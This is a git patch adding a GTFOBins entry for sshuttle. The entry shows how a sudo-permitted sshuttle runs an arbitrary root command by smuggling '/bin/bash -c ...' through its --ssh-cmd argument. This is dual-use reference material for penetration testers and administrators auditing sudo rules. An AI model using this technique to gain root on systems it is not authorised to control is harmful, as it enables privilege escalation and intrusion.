From 11c69d5497c18d783118410b35df76616069c88d Mon Sep 17 00:00:00 2001 From: Diego Tellaroli Date: Thu, 21 Dec 2023 21:52:14 -0300 Subject: [PATCH] Create sshuttle.md --- _gtfobins/sshuttle.md | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 _gtfobins/sshuttle.md diff --git a/_gtfobins/sshuttle.md b/_gtfobins/sshuttle.md new file mode 100644 index 0000000..a32009f --- /dev/null +++ b/_gtfobins/sshuttle.md @@ -0,0 +1,7 @@ +--- +functions: + sudo: + - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. The output of the executed command is in /tmp/root_id + code: | + sudo sshuttle -r root@anything --ssh-cmd "/bin/bash -c 'id>/tmp/root_id'" 192.168.3.3 +---